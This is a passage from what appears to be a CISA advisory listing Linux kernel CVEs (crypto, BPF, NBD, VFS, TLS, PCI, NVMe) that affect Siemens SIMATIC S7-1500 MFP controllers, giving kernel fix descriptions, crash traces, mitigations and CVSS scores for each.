<p>In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Fix incorrect boolean values in af_alg_ctx Commit 1b34cbbf4f01 ("crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg") changed some fields from bool to 1-bit bitfields of type u32. However, some assignments to these fields, specifically 'more' and 'merge', assign values greater than 1. These relied on C's implicit conversion to bool, such that zero becomes false and nonzero becomes true. With a 1-bit bitfields of type u32 instead, mod 2 of the value is taken instead, resulting in 0 being assigned in some cases when 1 was intended. Fix this by restoring the bool type.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40022">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/704.html">CWE-704 Incorrect Type Conversion or Cast</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40070</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pps: fix warning in pps_register_cdev when register device fail Similar to previous commit 2a934fdb01db ("media: v4l2-dev: fix error handling in __video_register_device()"), the release hook should be set before device_register(). Otherwise, when device_register() return error and put_device() try to callback the release function, the below warning may happen. ------------[ cut here ]------------ WARNING: CPU: 1 PID: 4760 at drivers/base/core.c:2567 device_release+0x1bd/0x240 drivers/base/core.c:2567 Modules linked in: CPU: 1 UID: 0 PID: 4760 Comm: syz.4.914 Not tainted 6.17.0-rc3+ #1 NONE RIP: 0010:device_release+0x1bd/0x240 drivers/base/core.c:2567 Call Trace: kobject_cleanup+0x136/0x410 lib/kobject.c:689 kobject_release lib/kobject.c:720 [inline] kref_put include/linux/kref.h:65 [inline] kobject_put+0xe9/0x130 lib/kobject.c:737 put_device+0x24/0x30 drivers/base/core.c:3797 pps_register_cdev+0x2da/0x370 drivers/pps/pps.c:402 pps_register_source+0x2f6/0x480 drivers/pps/kapi.c:108 pps_tty_open+0x190/0x310 drivers/pps/clients/pps-ldisc.c:57 tty_ldisc_open+0xa7/0x120 drivers/tty/tty_ldisc.c:432 tty_set_ldisc+0x333/0x780 drivers/tty/tty_ldisc.c:563 tiocsetd drivers/tty/tty_io.c:2429 [inline] tty_ioctl+0x5d1/0x1700 drivers/tty/tty_io.c:2728 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:598 [inline] __se_sys_ioctl fs/ioctl.c:584 [inline] __x64_sys_ioctl+0x194/0x210 fs/ioctl.c:584 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x5f/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e Before commit c79a39dc8d06 ("pps: Fix a use-after-free"), pps_register_cdev() call device_create() to create pps-&gt;dev, which will init dev-&gt;release to device_create_release(). Now the comment is outdated, just remove it. Thanks for the reminder from Calvin Owens, 'kfree_pps' should be removed in pps_register_source() to avoid a double free in the failure case.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40070">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40078</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Explicitly check accesses to bpf_sock_addr Syzkaller found a kernel warning on the following sock_addr program: 0: r0 = 0 1: r2 = *(u32 *)(r1 +60) 2: exit which triggers: verifier bug: error during ctx access conversion (0) This is happening because offset 60 in bpf_sock_addr corresponds to an implicit padding of 4 bytes, right after msg_src_ip4. Access to this padding isn't rejected in sock_addr_is_valid_access and it thus later fails to convert the access. This patch fixes it by explicitly checking the various fields of bpf_sock_addr in sock_addr_is_valid_access. I checked the other ctx structures and is_valid_access functions and didn't find any other similar cases. Other cases of (properly handled) padding are covered in new tests in a subsequent patch.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40078">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40080</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nbd: restrict sockets to TCP and UDP Recently, syzbot started to abuse NBD with all kinds of sockets. Commit cf1b2326b734 ("nbd: verify socket is supported during setup") made sure the socket supported a shutdown() method. Explicitely accept TCP and UNIX stream sockets.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40080">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40105</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: vfs: Don't leak disconnected dentries on umount When user calls open_by_handle_at() on some inode that is not cached, we will create disconnected dentry for it. If such dentry is a directory, exportfs_decode_fh_raw() will then try to connect this dentry to the dentry tree through reconnect_path(). It may happen for various reasons (such as corrupted fs or race with rename) that the call to lookup_one_unlocked() in reconnect_one() will fail to find the dentry we are trying to reconnect and instead create a new dentry under the parent. Now this dentry will not be marked as disconnected although the parent still may well be disconnected (at least in case this inconsistency happened because the fs is corrupted and .. doesn't point to the real parent directory). This creates inconsistency in disconnected flags but AFAICS it was mostly harmless. At least until commit f1ee616214cb ("VFS: don't keep disconnected dentries on d_anon") which removed adding of most disconnected dentries to sb-&gt;s_anon list. Thus after this commit cleanup of disconnected dentries implicitely relies on the fact that dput() will immediately reclaim such dentries. However when some leaf dentry isn't marked as disconnected, as in the scenario described above, the reclaim doesn't happen and the dentries are "leaked". Memory reclaim can eventually reclaim them but otherwise they stay in memory and if umount comes first, we hit infamous "Busy inodes after unmount" bug. Make sure all dentries created under a disconnected parent are marked as disconnected as well.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40105">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40135</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: use RCU in ip6_xmit() Use RCU in ip6_xmit() in order to use dst_dev_rcu() to prevent possible UAF.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40135">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40149</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tls: Use __sk_dst_get() and dst_dev_rcu() in get_netdev_for_sock(). get_netdev_for_sock() is called during setsockopt(), so not under RCU. Using sk_dst_get(sk)-&gt;dev could trigger UAF. Let's use __sk_dst_get() and dst_dev_rcu(). Note that the only -&gt;ndo_sk_get_lower_dev() user is bond_sk_get_lower_dev(), which uses RCU.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40149">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40219</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: PCI/IOV: Fix race between SR-IOV enable/disable and hotplug Commit 05703271c3cd ("PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV") tried to fix a race between the VF removal inside sriov_del_vfs() and concurrent hot unplug by taking the PCI rescan/remove lock in sriov_del_vfs(). Similarly the PCI rescan/remove lock was also taken in sriov_add_vfs() to protect addition of VFs. This approach however causes deadlock on trying to remove PFs with SR-IOV enabled because PFs disable SR-IOV during removal and this removal happens under the PCI rescan/remove lock. So the original fix had to be reverted. Instead of taking the PCI rescan/remove lock in sriov_add_vfs() and sriov_del_vfs(), fix the race that occurs with SR-IOV enable and disable vs hotplug higher up in the callchain by taking the lock in sriov_numvfs_store() before calling into the driver's sriov_configure() callback.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40219">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40261</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvme: nvme-fc: Ensure -&gt;ioerr_work is cancelled in nvme_fc_delete_ctrl() nvme_fc_delete_assocation() waits for pending I/O to complete before returning, and an error can cause -&gt;ioerr_work to be queued after cancel_work_sync() had been called. Move the call to cancel_work_sync() to be after nvme_fc_delete_association() to ensure -&gt;ioerr_work is not running when the nvme_fc_ctrl object is freed. Otherwise the following can occur: [ 1135.911754] list_del corruption, ff2d24c8093f31f8-&gt;next is NULL [ 1135.917705] ------------[ cut here ]------------ [ 1135.922336] kernel BUG at lib/list_debug.c:52! [ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI [ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary) [ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025 [ 1135.950969] Workqueue: 0x0 (nvme-wq) [ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f [ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff &lt;0f&gt; 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b [ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046 [ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000 [ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0 [ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08 [ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100 [ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0 [ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000 [ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0 [ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 1136.055910] PKRU: 55555554 [ 1136.058623] Call Trace: [ 1136.061074] [ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0 [ 1136.071898] ? move_linked_works+0x4a/0xa0 [ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.081744] ? __die_body.cold+0x8/0x12 [ 1136.085584] ? die+0x2e/0x50 [ 1136.088469] ? do_trap+0xca/0x110 [ 1136.091789] ? do_error_trap+0x65/0x80 [ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.101289] ? exc_invalid_op+0x50/0x70 [ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20 [ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f [ 1136.120806] move_linked_works+0x4a/0xa0 [ 1136.124733] worker_thread+0x216/0x3a0 [ 1136.128485] ? __pfx_worker_thread+0x10/0x10 [ 1136.132758] kthread+0xfa/0x240 [ 1136.135904] ? __pfx_kthread+0x10/0x10 [ 1136.139657] ret_from_fork+0x31/0x50 [ 1136.143236] ? __pfx_kthread+0x10/0x10 [ 1136.146988] ret_from_fork_asm+0x1a/0x30 [ 1136.150915]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40261">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
